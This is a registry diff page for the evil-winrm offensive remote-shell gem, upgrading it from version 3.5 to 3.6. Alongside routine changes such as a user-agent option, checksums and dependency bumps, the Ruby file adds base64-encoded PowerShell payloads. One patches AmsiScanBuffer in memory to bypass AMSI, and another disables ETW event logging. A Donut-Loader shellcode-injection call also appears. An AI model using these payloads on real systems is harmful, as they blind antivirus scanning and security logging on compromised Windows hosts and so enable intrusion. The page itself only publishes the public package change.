evil-winrm 3.5 → 3.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/evil-winrm.rb +33 -15
  3. metadata +7 -7
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 015aebb85b6d61e430126ece28f4495fcc234d29cba5b9f11f187a551c4e4838
4
- data.tar.gz: b66a32f2f4ba1dfed745ddf67c005271b7ec8cedf5f8025467aa64504bf5fc16
3
+ metadata.gz: 11cbf4c87fb485b3e75bba373489df758d42cb83e2f4241ac2050d49d47855cd
4
+ data.tar.gz: dc27a65532ba270c3fe759f24596182f69964b38f3121f02b5012ffe1603b6ee
5
5
  SHA512:
6
- metadata.gz: f2984a00290ed3921b9d69cbc27a46e31555cbb46508dfc829f6ceb02b20e8317f4c7074f8c3974faebc951f16a90d1687e3011a4a3518371b7ee10970c48f26
7
- data.tar.gz: e41af05002e21a5628bddb5e86eefbecaf2913b0d1a119035725566d3ddcad0c73c2831b5030fb53bf0b23fecdfa2ca1ee4856b85c525f755dd76e1bec926be8
6
+ metadata.gz: 3da2f100a245cbcfe9a14a50b72ccb900722204517d6db37abbb98cc90b48566abf4a7f4eff42d5a58f950e3ee9dc798fdeedb1af80678fe0310b62d7daa604f
7
+ data.tar.gz: 94ff2e006ad6328cfc12975b7d79000dfb376c1bed5c0db90e85d45bb041941f8290ce7611ab817bcbc37b6fefcdc3e4432295f79f73ef62a03cac794b2efb56
data/evil-winrm.rb CHANGED
@@ -17,11 +17,12 @@ require 'io/console'
17
17
  require 'time'
18
18
  require 'fileutils'
19
19
  require 'logger'
20
+ require 'shellwords'
20
21
 
21
22
  # Constants
22
23
 
23
24
  # Version
24
- VERSION = '3.5'
25
+ VERSION = '3.6'
25
26
 
26
27
  # Msg types
27
28
  TYPE_INFO = 0
@@ -56,6 +57,7 @@ $password = ''
56
57
  $url = 'wsman'
57
58
  $default_service = 'HTTP'
58
59
  $full_logging_path = "#{Dir.home}/evil-winrm-logs"
60
+ $user_agent = "Microsoft WinRM Client"
59
61
 
60
62
  # Redefine download method from winrm-fs
61
63
  module WinRM
@@ -64,7 +66,7 @@ module WinRM
64
66
  def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1)
65
67
  @logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}")
66
68
  index = 0
67
- return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.|\*\*|\.\*|\*)/)
69
+ return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/)
68
70
  output = _output_from_file(remote_path, chunk_size, index)
69
71
  return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2
70
72
  return false if output.exitcode >= 1
@@ -89,7 +91,7 @@ module WinRM
89
91
  end
90
92
 
91
93
  def download_dir(remote_path, local_path, chunk_size, first)
92
- index_exp = remote_path.index(/(\*\.|\*\*|\.\*|\*)/) || 0
94
+ index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0
93
95
  remote_file_path = remote_path
94
96
 
95
97
  if index_exp > 0
@@ -155,13 +157,16 @@ class EvilWinRM
155
157
 
156
158
  # Arguments
157
159
  def arguments
158
- options = { port: $port, url: $url, service: $service }
160
+ options = { port: $port, url: $url, service: $service, user_agent: $user_agent }
159
161
  optparse = OptionParser.new do |opts|
160
- opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
162
+ opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
161
163
  opts.on('-S', '--ssl', 'Enable ssl') do |_val|
162
164
  $ssl = true
163
165
  options[:port] = '5986'
164
166
  end
167
+ opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val|
168
+ options[:user_agent] = val
169
+ end
165
170
  opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val|
166
171
  options[:pub_key] = val
167
172
  end
@@ -253,6 +258,7 @@ class EvilWinRM
253
258
  $priv_key = options[:priv_key]
254
259
  $realm = options[:realm]
255
260
  $service = options[:service]
261
+ $user_agent = options[:user_agent]
256
262
  unless $log.nil?
257
263
 
258
264
  FileUtils.mkdir_p $full_logging_path
@@ -289,7 +295,8 @@ class EvilWinRM
289
295
  no_ssl_peer_verification: true,
290
296
  transport: :ssl,
291
297
  client_cert: $pub_key,
292
- client_key: $priv_key
298
+ client_key: $priv_key,
299
+ user_agent: $user_agent
293
300
  )
294
301
  else
295
302
  WinRM::Connection.new(
@@ -297,7 +304,8 @@ class EvilWinRM
297
304
  user: $user,
298
305
  password: $password,
299
306
  no_ssl_peer_verification: true,
300
- transport: :ssl
307
+ transport: :ssl,
308
+ user_agent: $user_agent
301
309
  )
302
310
  end
303
311
 
@@ -308,14 +316,16 @@ class EvilWinRM
308
316
  password: '',
309
317
  transport: :kerberos,
310
318
  realm: $realm,
311
- service: $service
319
+ service: $service,
320
+ user_agent: $user_agent
312
321
  )
313
322
  else
314
323
  $conn = WinRM::Connection.new(
315
324
  endpoint: "http://#{$host}:#{$port}/#{$url}",
316
325
  user: $user,
317
326
  password: $password,
318
- no_ssl_peer_verification: true
327
+ no_ssl_peer_verification: true,
328
+ user_agent: $user_agent
319
329
  )
320
330
  end
321
331
  end
@@ -379,10 +389,10 @@ class EvilWinRM
379
389
  priv_key = priv_key.to_s
380
390
  if $ssl
381
391
  unless pub_key.empty? && priv_key.empty? then
382
- unless [pub_key, priv_key].all? {|f| File.exists?(f) } then
383
- print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(pub_key)
392
+ unless [pub_key, priv_key].all? {|f| File.exist?(f) } then
393
+ print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key)
384
394
 
385
- print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(priv_key)
395
+ print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key)
386
396
 
387
397
  custom_exit(1)
388
398
  end
@@ -678,6 +688,7 @@ class EvilWinRM
678
688
  dest = ""
679
689
  source = ""
680
690
  paths = get_paths_from_command(command, pwd)
691
+
681
692
  if paths.length == 2
682
693
  dest = paths.pop
683
694
  source = paths.pop
@@ -759,6 +770,8 @@ class EvilWinRM
759
770
  load_executable = File.binread(load_executable)
760
771
  load_executable = Base64.strict_encode64(load_executable)
761
772
  output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}")
773
+ else
774
+ output = shell.run("Donut-Loader")
762
775
  end
763
776
  print(output.output)
764
777
  $logger&.info(output.output)
@@ -908,7 +921,7 @@ class EvilWinRM
908
921
  end
909
922
 
910
923
  def get_Bypass_4MSI
911
- bypass_template = 'JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGljIGNsYXNzIGNvZGUgewogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRQcm9jQWRkcmVzcyhJbnRQdHIgaE1vZHVsZSwgc3RyaW5nIHByb2NOYW1lKTsKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZExpYnJhcnkoc3RyaW5nIG5hbWUpOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBydW9xeHAsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cn0KIkAKQWRkLVR5cGUgJGNvZGUKJGZqdGZxd24gPSBbY29kZV06OkxvYWRMaWJyYXJ5KCJhbXNpLmRsbCIpCiNqdW1wCiRqeXV5amcgPSBbY29kZV06OkdldFByb2NBZGRyZXNzKCRmanRmcXduLCAiIiskdmFyMSsiIikKJHAgPSAwCiNqdW1wCiRudWxsID0gW2NvZGVdOjpWaXJ0dWFsUHJvdGVjdCgkanl1eWpnLCBbdWludDMyXTUsIDB4NDAsIFtyZWZdJHApCiRmbnh5ID0gIjB4QjgiCiRmbXh5ID0gIjB4NTciCiRld2FxID0gIjB4MDAiCiR3ZnRjID0gIjB4MDciCiRuZHVnID0gIjB4ODAiCiRobXp4ID0gIjB4QzMiCiNqdW1wCiRsbGZhbSA9IFtCeXRlW11dICgkZm54eSwkZm14eSwkZXdhcSwkd2Z0YywrJG5kdWcsKyRobXp4KQokbnVsbCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGxsZmFtLCAwLCAkanl1eWpnLCA2KSA='
924
+ bypass_template = 'ZnVuY3Rpb24gTG9va3VwRnVuYyB7CiAgICBQYXJhbSAoJG1vZHVsZU5hbWUsICRmdW5jdGlvbk5hbWUpCiAgICAkYXNzZW0gPSAoW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpIHwKICAgIFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uCiAgICAgRXF1YWxzKCdTeXN0ZW0uZGxsJykKICAgICB9KS5HZXRUeXBlKCdNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcycpCiAgICAkdG1wPUAoKQogICAgJGFzc2VtLkdldE1ldGhvZHMoKSB8IEZvckVhY2gtT2JqZWN0IHtJZigkXy5OYW1lIC1saWtlICJHZSpQKm9jKmRkcmVzcyIpIHskdG1wKz0kX319CiAgICByZXR1cm4gJHRtcFswXS5JbnZva2UoJG51bGwsIEAoKCRhc3NlbS5HZXRNZXRob2QoJ0dldE1vZHVsZUhhbmRsZScpKS5JbnZva2UoJG51bGwsCkAoJG1vZHVsZU5hbWUpKSwgJGZ1bmN0aW9uTmFtZSkpCn0KI2p1bXAKCmZ1bmN0aW9uIGdldERlbGVnYXRlVHlwZSB7CiAgICBQYXJhbSAoCiAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlKV0gW1R5cGVbXV0KICAgICAkZnVuYywgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJGRlbFR5cGUgPSBbVm9pZF0KICAgICkKICAgICR0eXBlID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uCiAgICBEZWZpbmVEeW5hbWljQXNzZW1ibHkoKE5ldy1PYmplY3QgU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHlOYW1lKCdSZWZsZWN0ZWREZWxlZ2F0ZScpKSwKW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS4KICAgIERlZmluZUR5bmFtaWNNb2R1bGUoJ0luTWVtb3J5TW9kdWxlJywgJGZhbHNlKS4KICAgIERlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLAogICAgQXV0b0NsYXNzJywgW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pCgogICR0eXBlLgogICAgRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywKW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkZnVuYykuCiAgICAgU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpCgogICR0eXBlLgogICAgRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwnLCAkZGVsVHlwZSwKJGZ1bmMpLiBTZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKICAgIHJldHVybiAkdHlwZS5DcmVhdGVUeXBlKCkKfQojanVtcAoKJGE9IkEiCiRiPSJtc2lTIgokYz0iY2FuQiIKJGQ9InVmZmVyIgojanVtcApbSW50UHRyXSRmdW5jQWRkciA9IExvb2t1cEZ1bmMgYW1zaS5kbGwgKCRhKyRiKyRjKyRkKQojanVtcAokb2xkUHJvdGVjdGlvbkJ1ZmZlciA9IDAKI2p1bXAKJHZwPVtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChMb29rdXBGdW5jIGtlcm5lbDMyLmRsbCBWaXJ0dWFsUHJvdGVjdCksIChnZXREZWxlZ2F0ZVR5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXS5NYWtlQnlSZWZUeXBlKCkpIChbQm9vbF0pKSkKI2p1bXAKJGEgPSAkdnAuSW52b2tlKCRmdW5jQWRkciwgMywgMHg0MCwgW3JlZl0kb2xkUHJvdGVjdGlvbkJ1ZmZlcikKI2p1bXAKJGJ1ZiA9IFtCeXRlW11dICgweGI4LDB4MzQsMHgxMiwweDA3LDB4ODAsMHg2NiwweGI4LDB4MzIsMHgwMCwweGIwLDB4NTcsMHhjMykKI2p1bXAKJGEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRidWYsIDAsICRmdW5jQWRkciwgMTIpCiNqdW1wClJlbW92ZS1JdGVtIEZ1bmN0aW9uOmdldERlbGVnYXRlVHlwZQojanVtcApSZW1vdmUtSXRlbSBGdW5jdGlvbjpMb29rdXBGdW5jCgo='
912
925
  dec_template = Base64.decode64(bypass_template)
913
926
  result = dec_template.gsub('$var1', generate_random_type_string)
914
927
  @bypass_amsi_words_random_case.each { |w| result.gsub!(w.to_s, random_case(w)) }
@@ -927,6 +940,12 @@ class EvilWinRM
927
940
  output = shell.run(bypass)
928
941
  if output.output.empty?
929
942
  print_message('[+] Success!', TYPE_SUCCESS, false)
943
+ print_message('Patching ETW, please be patient ..', TYPE_INFO, true)
944
+ patch_etw = Base64.decode64("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uQ29yZScpLkdldFR5cGUoJ1N5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVyJykuR2V0RmllbGQoJ21fZW5hYmxlZCcsJ05vblB1YmxpYyxJbnN0YW5jZScpLlNldFZhbHVlKFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVyJykuR2V0RmllbGQoJ2V0d1Byb3ZpZGVyJywnTm9uUHVibGljLFN0YXRpYycpLkdldFZhbHVlKCksMCkK")
945
+ output = shell.run(patch_etw)
946
+ print_message('[+] Success!', TYPE_SUCCESS, false)
947
+ output = shell.run("Remove-Item Function:getDelegateType")
948
+ output = shell.run ("Remove-Item Function:LookupFunc")
930
949
  else
931
950
  puts(output.output)
932
951
  end
@@ -939,9 +958,8 @@ class EvilWinRM
939
958
  end
940
959
 
941
960
  def get_paths_from_command(command, pwd)
942
- parts = command.split
961
+ parts = Shellwords.shellsplit(command)
943
962
  parts.delete_at(0)
944
- parts.each { |p| p.gsub!('"', '') }
945
963
  return parts
946
964
  end
947
965
 
metadata CHANGED
@@ -1,17 +1,17 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: evil-winrm
3
3
  version: !ruby/object:Gem::Version
4
- version: '3.5'
4
+ version: '3.6'
5
5
  platform: ruby
6
6
  authors:
7
7
  - CyberVaca
8
8
  - OscarAkaElvis
9
9
  - Jarilaos
10
10
  - Arale61
11
- autorequire:
11
+ autorequire:
12
12
  bindir: bin
13
13
  cert_chain: []
14
- date: 2023-04-21 00:00:00.000000000 Z
14
+ date: 2024-10-06 00:00:00.000000000 Z
15
15
  dependencies:
16
16
  - !ruby/object:Gem::Dependency
17
17
  name: fileutils
@@ -70,7 +70,7 @@ dependencies:
70
70
  version: '2.3'
71
71
  - - ">="
72
72
  - !ruby/object:Gem::Version
73
- version: 2.3.2
73
+ version: 2.3.7
74
74
  type: :runtime
75
75
  prerelease: false
76
76
  version_requirements: !ruby/object:Gem::Requirement
@@ -80,7 +80,7 @@ dependencies:
80
80
  version: '2.3'
81
81
  - - ">="
82
82
  - !ruby/object:Gem::Version
83
- version: 2.3.2
83
+ version: 2.3.7
84
84
  - !ruby/object:Gem::Dependency
85
85
  name: winrm-fs
86
86
  requirement: !ruby/object:Gem::Requirement
@@ -151,8 +151,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
151
151
  - !ruby/object:Gem::Version
152
152
  version: '0'
153
153
  requirements: []
154
- rubygems_version: 3.2.5
155
- signing_key:
154
+ rubygems_version: 3.3.15
155
+ signing_key:
156
156
  specification_version: 4
157
157
  summary: Evil-WinRM
158
158
  test_files: []